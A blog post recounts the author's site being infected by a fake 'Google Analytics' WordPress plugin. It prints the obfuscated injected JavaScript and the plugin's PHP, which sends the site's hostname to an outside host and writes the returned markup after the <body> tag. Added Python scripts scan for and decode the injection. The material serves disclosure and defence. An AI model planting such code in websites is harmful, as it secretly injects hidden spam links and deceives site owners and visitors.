DNExpert.com - domain name news & opinions!

Website Hacked – Removing The Google Analytics Malicious WordPress Plugin

A few weeks ago I installed what I deemed a safe plugin from the WordPress directory called Google Analytics v6.5.3. I didn’t pay much attention to it, considering the plugin was vetted by the WordPress plugin directory. The plugin’s author info said it was authored by Google (that should have rung alarm bells, I know, but it didn’t at the time).

Had I looked at the plugin folder name before I ran the install script I would have known something was wrong, because the plugin folder was unusually named “face-for-all-children-everywhere” and the plugin linked to the following repository address www.wordpress.org/extend/plugins/face-for-all-children-everywhere.

A few days later I was doing some housekeeping on the blog, as one does, and as part of that I ran my blog’s address through one of those online SEO analysis tools (I can’t for the life of me remember which one) to see what sort of health my SEO was in. The report the site generated warned me that my blog was unhealthily linking to one specific domain name, from all over the place. When I saw the domain name “http://www.ecigbuyingguide.com/reviews/green-smoke/” I immediately knew that something was wrong, because I certainly didn’t link to this website.

When I looked into my blog’s HTML source – [right click -> View source] – there was the following code just after the <body> tag:

<script language="JavaScript">var _ga4 = []; _ga4.push(['_setOption', '1301851861911781711021861911821711311041861711901861171']); _ga4.push(['_setOption', '6918518510413211618517817517017118416518918416718218217']); _ga4.push(['_setOption', '1184165171180193182181185175186175181180128167168185181']); _ga4.push(['_setOption', '1781871861711291691781751821281841711691861101221261181']); _ga4.push(['_setOption', '8219011416718718618111416718718618111412212611818219011']); _ga4.push(['_trackPageview', '1129195130117185186191178171132']); var t=z="",l=pos=v=0,a1="arCo",a2="omCh";for (v=0; v<_ga4.length; v++) t += _ga4[v][1];l=t.length; while (pos < l) z += String["fr"+a2+a1+"de"](parseInt(t.slice(pos,pos+=3))-70); document.write(z);</script><div class=slider_wrapper_en><h1><a href='http://www.ecigbuyingguide.com/reviews/green-smoke/'>Green Smoke</a></h1></div>

Alarm bells were certainly ringing now! I was freaking out. I downloaded my theme files and all my plugin files, exported my database, and extensively searched for anything containing the above – without success. I then Googled some of the terms contained in the above code and came up short. I finally found a reference to http://quttera.com and their Facebook page, and things were looking up, as over the last day or so they had been finding a number of sites with similar malicious code.

Further research finally led me to this thread on the WordPress forums which confirmed my suspicions that the Google Analytics plugin was indeed the source of the malicious code.

Looking through the plugin source code, I found how they were doing it too. Pay attention to the following code in particular:


// Hooked on the template_include filter at priority 1: opens an output buffer so the
// whole rendered page can be captured later, and hands the template back untouched.
function get_cred($template) {
    ob_start();
    return $template;
}

// Fetches attacker-controlled markup keyed on this site's hostname, takes the buffered
// page and writes it back out with that markup inserted directly after the <body> tag.
function cred() {
    $l = file_get_contents('http://home-ahref.com/v5/credit/'.$_SERVER['SERVER_NAME']);
    $content = ob_get_clean();
    // The "<body" part of the pattern and of the replacement was swallowed by the blog's
    // HTML rendering; it is restored here from the post's description of where the code lands.
    echo preg_replace('#<body([^>]*)>#i', "<body$1>{$l}", $content);
}

add_filter('template_include', 'get_cred', 1);
// The hook that invokes cred() at the end of the request is not part of this excerpt.

The plugin was calling the malicious home-ahref.com website with my domain name and retrieving source tailored to that domain, which it then injected into my website.
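The combination above is recognisable from the plugin source alone: a fetch from a remote host at request time with the site’s own hostname in the URL, the whole page captured through an output buffer opened on template_include, and a rewrite around the <body> tag that writes the fetched content out. The Python below is an added example, not code from this post or from WordPress: a triage script that flags PHP plugin files showing several of those indicators together, so a single legitimate remote call does not trip it. Both samples are constructed for the example; the malicious one restates the excerpt above (with the <body> pieces restored), the benign one is an ordinary footer snippet.

```python
import re

# Constructed sample: the plugin excerpt from the post, <body> pattern restored.
MALICIOUS_PLUGIN_SAMPLE = r'''
function get_cred($template) { ob_start(); return $template; }
function cred() {
    $l = file_get_contents('http://home-ahref.com/v5/credit/'.$_SERVER['SERVER_NAME']);
    $content = ob_get_clean();
    echo preg_replace('#<body([^>]*)>#i', "<body$1>{$l}", $content);
}
add_filter('template_include', 'get_cred', 1);
'''

# Constructed sample: a harmless plugin that only echoes a locally configured value.
BENIGN_PLUGIN_SAMPLE = r'''
function ga_footer_script() {
    $id = esc_attr(get_option('ga_tracking_id'));
    echo "<script>/* analytics snippet for $id */</script>";
}
add_action('wp_footer', 'ga_footer_script');
'''

# Functions that pull content from elsewhere. wp_remote_get is legitimate in many
# plugins, which is why a single indicator never makes a file "suspicious" on its own.
FETCH_FUNCS = r"(?:file_get_contents|curl_exec|fopen|wp_remote_get|wp_remote_retrieve_body)"
REMOTE_ASSIGN = re.compile(r"\$(\w+)\s*=\s*" + FETCH_FUNCS + r"\s*\(", re.I)
REMOTE_URL = re.compile(r"['\"]https?://", re.I)
HOST_LEAK = re.compile(r"\$_SERVER\s*\[\s*['\"](?:SERVER_NAME|HTTP_HOST)['\"]\s*\]")
# A replace call whose pattern, within the same statement, names <body>, <head> or <html>.
MARKUP_REWRITE = re.compile(r"(?:preg_replace|str_replace|str_ireplace)\s*\([^;]*?<\s*/?\s*(?:body|head|html)", re.I)
OB_CAPTURE = re.compile(r"ob_get_(?:clean|contents|flush)")
TEMPLATE_HOOK = re.compile(r"add_filter\s*\(\s*['\"]template_include['\"]")


def split_statements(php):
    """Crude split on ';' - good enough for a first triage pass over plugin files."""
    return [s.strip() for s in php.split(";") if s.strip()]


def scan_plugin_source(php):
    """Return a list of human-readable indicators found in one PHP source string."""
    findings = []
    fetched_vars = set()
    for stmt in split_statements(php):
        m = REMOTE_ASSIGN.search(stmt)
        # Only count a fetch that clearly leaves the box: literal http(s) URL or the
        # site's hostname spliced into the request.
        if m and (REMOTE_URL.search(stmt) or HOST_LEAK.search(stmt)):
            fetched_vars.add(m.group(1))
            findings.append("remote content fetched at request time into $%s" % m.group(1))
            if HOST_LEAK.search(stmt):
                findings.append("the site's own hostname is sent to the remote server")
    if "ob_start" in php and OB_CAPTURE.search(php) and TEMPLATE_HOOK.search(php):
        findings.append("whole-page output buffered via a template_include filter")
    if MARKUP_REWRITE.search(php):
        findings.append("page markup rewritten around <body>/<head>/<html>")
    for var in sorted(fetched_vars):
        # Fetched variable reused in an output statement: the remote content reaches visitors.
        if re.search(r"(?:echo|print|preg_replace|str_replace)\b[^;]*\$" + re.escape(var) + r"\b", php):
            findings.append("fetched content $%s is written into the page" % var)
    return findings


def is_suspicious(php, threshold=3):
    """Three or more independent indicators in one file is worth a manual look."""
    return len(scan_plugin_source(php)) >= threshold


if __name__ == "__main__":
    for name, src in (("malicious", MALICIOUS_PLUGIN_SAMPLE), ("benign", BENIGN_PLUGIN_SAMPLE)):
        print(name, is_suspicious(src), scan_plugin_source(src))
```

Run it over every .php file under wp-content/plugins before activating a new plugin; the statement splitter is deliberately naive, so treat the output as a list of places to read by hand rather than a verdict.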

If you open the following URL, you will see the generated code. I don’t want to link to them directly for fear of Google associating my website with their malicious domain name:
http://home-ahref.com/v5/credit/www.dnexpert.com

When you look at the html source of the above link you will see the same malicious code that was printed just after the <body> tag I referenced earlier.

<script language="JavaScript">var _ga4 = []; _ga4.push(['_setOption', '1301851861911781711021861911821711311041861711901861171']); _ga4.push(['_setOption', '6918518510413211618517817517017118416518918416718218217']); _ga4.push(['_setOption', '1184165171180193182181185175186175181180128167168185181']); _ga4.push(['_setOption', '1781871861711291691781751821281841711691861101221261181']); _ga4.push(['_setOption', '8219011416718718618111416718718618111412212611818219011']); _ga4.push(['_trackPageview', '1129195130117185186191178171132']); var t=z="",l=pos=v=0,a1="arCo",a2="omCh";for (v=0; v<_ga4.length; v++) t += _ga4[v][1];l=t.length; while (pos < l) z += String["fr"+a2+a1+"de"](parseInt(t.slice(pos,pos+=3))-70); document.write(z);</script><div class=slider_wrapper_en><h1><a href='http://www.ecigbuyingguide.com/reviews/green-smoke/'>Green Smoke</a></h1></div>
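The `_ga4` loader in the snippet above (and in the identical one from my page source earlier) is not analytics code: it joins the digit strings from every push call, reads them three digits at a time, subtracts 70 from each group and writes the resulting characters into the page with document.write. The Python below is an added example, not part of the original post, that reproduces the decode offline on that snippet and also lists the link hosts and the div class the decoded CSS targets. `INJECTED` is the snippet copied from above; the function names are mine.

```python
import re
from urllib.parse import urlparse

# Constructed input: the injected snippet copied from the post, as it sits in the page
# source right after the <body> tag. Nothing here touches the network.
INJECTED = """<script language="JavaScript">var _ga4 = []; _ga4.push(['_setOption', '1301851861911781711021861911821711311041861711901861171']); _ga4.push(['_setOption', '6918518510413211618517817517017118416518918416718218217']); _ga4.push(['_setOption', '1184165171180193182181185175186175181180128167168185181']); _ga4.push(['_setOption', '1781871861711291691781751821281841711691861101221261181']); _ga4.push(['_setOption', '8219011416718718618111416718718618111412212611818219011']); _ga4.push(['_trackPageview', '1129195130117185186191178171132']); var t=z="",l=pos=v=0,a1="arCo",a2="omCh";for (v=0; v<_ga4.length; v++) t += _ga4[v][1];l=t.length; while (pos < l) z += String["fr"+a2+a1+"de"](parseInt(t.slice(pos,pos+=3))-70); document.write(z);</script><div class=slider_wrapper_en><h1><a href='http://www.ecigbuyingguide.com/reviews/green-smoke/'>Green Smoke</a></h1></div>"""

PUSH_RE = re.compile(r"_ga4\.push\(\['_(?:setOption|trackPageview)',\s*'(\d+)'\]\)")
HREF_RE = re.compile(r"""href=(["'])(.*?)\1""", re.I)
CLASS_RE = re.compile(r"""<div\s+class=["']?([\w-]+)""", re.I)


def extract_chunks(html):
    """Digit strings from every _ga4.push(...) call, in page order."""
    return PUSH_RE.findall(html)


def decode_ga4(chunks, width=3, offset=70):
    """Mirror the loader's loop: join the chunks, take 3-digit groups, subtract 70,
    map each result to its character code."""
    digits = "".join(chunks)
    text = []
    for pos in range(0, len(digits), width):
        group = digits[pos:pos + width]
        if len(group) < width:
            break  # a dangling partial group is not a usable code point; the loader would emit junk here
        text.append(chr(int(group) - offset))
    return "".join(text)


def link_hosts(html):
    """Hosts of every href in the snippet - the targets the SEO tool complained about."""
    hosts = {urlparse(url).hostname for _, url in HREF_RE.findall(html)}
    return sorted(h for h in hosts if h)


def analyse(html):
    decoded = decode_ga4(extract_chunks(html))
    classes = CLASS_RE.findall(html)
    return {
        "decoded": decoded,
        # div classes that the smuggled CSS styles with a clip rule: present in the
        # markup, but clipped out of view in the browser
        "hidden_classes": [c for c in classes if "." + c + "{" in decoded and "clip:" in decoded],
        "link_hosts": link_hosts(html),
    }


if __name__ == "__main__":
    for key, value in analyse(INJECTED).items():
        print(key, "=", value)
```

The decoded payload is a single style rule, `.slider_wrapper_en{position:absolute;clip:rect(480px,auto,auto,480px);}`, applied to the div that carries the “Green Smoke” link: the link stays in the HTML where a source-level tool sees it, while the clip region starting 480px from the top and left keeps it invisible to anyone viewing the page.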

Once I knew where the malware was originating from, I quickly deleted the Google Analytics plugin and asked my host to do one more scan of all my files and folders (and db) to make sure nothing else was infected. Hopefully, my website is safe.

This post should serve as a warning to others – even though WordPress is supposed to vet the plugins that make it into their repository, malicious users will continue trying to get around WordPress’s safety procedures – and many of them will succeed. Make sure you personally vet every plugin you install to ascertain that you are not endangering your website and losing money in the long term.

9 comments

  1. Ha. It’s getting scarier day by day what the free plugins can do. Sometimes it’s not in the first release, but at a later upgrade that they insert this stuff.
    Maybe we need to start our own CMS development.

  2. Thank you for the post.
    I removed the plugin immediately from my personal blog as soon as I read your post.
    Cheers!

  3. Pingback: » Wordpress Plugins & Hackers… Constantly Crafting

  4. Thank You!!! I have been trying to figure out which plugin was screwing up my WordPress site. After deleting this plug-in, all is well again.

  5. I do remember downloading a plugin once that would start making random stuff happen. I deleted it and things went back to normal; now I do try to keep the plugin usage down to a minimum. WP Jetpack helps a lot in tracking my Insight/Analytics for my website…!

  6. Hi – we can see the malicious code in the source but don’t have the GA plugin installed ?? Are there other plugins associated with this issue?
